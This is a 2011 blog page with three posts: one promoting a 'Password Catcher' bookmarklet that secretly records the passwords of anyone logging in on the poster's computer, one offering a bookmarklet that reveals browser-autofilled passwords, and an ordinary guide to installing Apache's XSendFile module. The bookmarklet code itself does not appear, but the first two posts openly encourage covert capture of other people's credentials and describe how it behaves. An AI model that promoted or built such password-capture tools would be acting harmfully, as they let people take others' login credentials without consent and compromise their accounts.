Friday, September 23, 2011

Password Catcher

Intro


The Password Catcher allows you to catch anyone's password who's using your System

All you have to do is to click on the "catch" bookmark before he tries to login.

The script is Page Domain Dependent. For eg. you can only view the saved passwords of

facebook.com if you're on facebook.com.



OMG!! how this thing works?



You can see below there are two Bookmarklets "catch"and "show".

just drag these bookmarklets to your bookmark bar.

When you're on a Login Page click the "catch" bookmark" and the script

will be activated. Don't HIT REFRESH once you've clicked catch.It'll disable the script.

After the Catch is activated and then a person tries to login then his login will fail.

His submit or login button will become irresponsive. IT MEANS THE SCRIPT worked fine

and his password is stored.

If you want to LOGIN you've to refresh the Page


Now to view the Stored PASSWORD click the show button.
The Show button will open a Dialog box like this :







Limitations

1.if two users have a same password for a particular website then only one of

the password is saved.
2. To view the passwords of a particular domain you've to be on that domain.

3. The script remains active until the page is not refreshed.



Suggestions

who ever visits this page and likes this script please suggest some improvements

if you think the script can be improved

Bookmarklets

drag these Bookmarklets to the bookmark bar.

catch


show








Tuesday, September 6, 2011

Hack AutoFill Passwords

The Autofill feature is very common in modern browsers.
You can able to login with the data autofilled by the browser
but you can't view the content of password field.

This Javascript hack will show you the content of that field.

It's working Fine in All the leading Browsers, just bookmark the bookmarklet script below
and click on it as soon as you see a autofilled password field.

bookmark me

Wednesday, July 13, 2011

XSendFile installation in windows

XSendFile
XSendFile is a plugin for apache server so that PHP file can process big files.

installation in windows:
manually transfer the mod_xsendfile.so file to the 'apache/modules/' folder.
open http.conf and paste this line :

LoadModule xsendfile_module modules/mod_xsendfile.so
make sure there's no '#' before otherwise it'll not work.
now save the http.conf file and restart the apache server.

now to set the modes of XSendFile paste these lines in httpd.conf:
# Enable mod_xsendfile
#permitted values on/off
XSendFile on
# XSendFilePath allow you to add additional paths to some
# kind of white list. All files within these paths are
#allowed to get served through mod_xsendfile
XSendFilePath ../../../www/backup/downloads/mplayers

the XSendFilePath is use to set a whitelist folder.
the path I used above is relative to the main apache server directory.
you can also use absolute path like: "c:\wamp\www\myfiles\"